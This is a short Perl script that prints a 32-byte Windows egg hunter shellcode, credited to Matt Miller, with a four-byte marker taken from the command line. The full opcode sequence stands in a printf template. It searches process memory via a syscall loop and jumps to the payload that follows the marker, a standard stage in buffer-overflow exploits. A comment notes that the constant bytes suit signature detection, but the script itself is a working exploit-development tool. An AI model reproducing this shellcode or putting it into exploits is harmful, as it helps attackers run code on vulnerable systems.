Generates 32-byte egg hunter code, based on Matt Miller's implementation
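#!/usr/bin/perl
# Prints a 32-byte egg hunter as an escaped "\xNN" string, with the four
# egg bytes taken from the command line.
# Example:
# $ ./egghunter.pl 41424344
use strict;
use warnings;

# Egg hunter implementation by Matt Miller, kept as a printf template.
# The four "%s" slots follow the 0xb8 opcode byte and receive the egg bytes;
# once they are filled in the sequence is 32 bytes long.
# Every other byte is constant, so the emitted string is a stable pattern
# that byte-signature detection rules can match on.
my $egghunter = "\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\\xef\\xb8\\x%s\\x%s\\x%s\\x%s\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7";

# The egg must be exactly four bytes written as eight hex digits.
# Without this check a missing argument triggers "uninitialized value"
# warnings, and a short, odd-length or non-hex argument produces a string
# that is not valid "\xNN" notation (or leaves printf slots unfilled).
my $egg = $ARGV[0];
if (!defined $egg || $egg !~ /\A[0-9A-Fa-f]{8}\z/) {
    die "Usage: $0 <egg as 8 hex digits, e.g. 41424344>\n";
}

# Split into two-character byte strings, kept in the order they were given.
my @egg_bytes = ($egg =~ m/../g);

print("# Egghunter 32 bytes - Egg: $egg\n\n");
printf($egghunter, @egg_bytes);
print("\n");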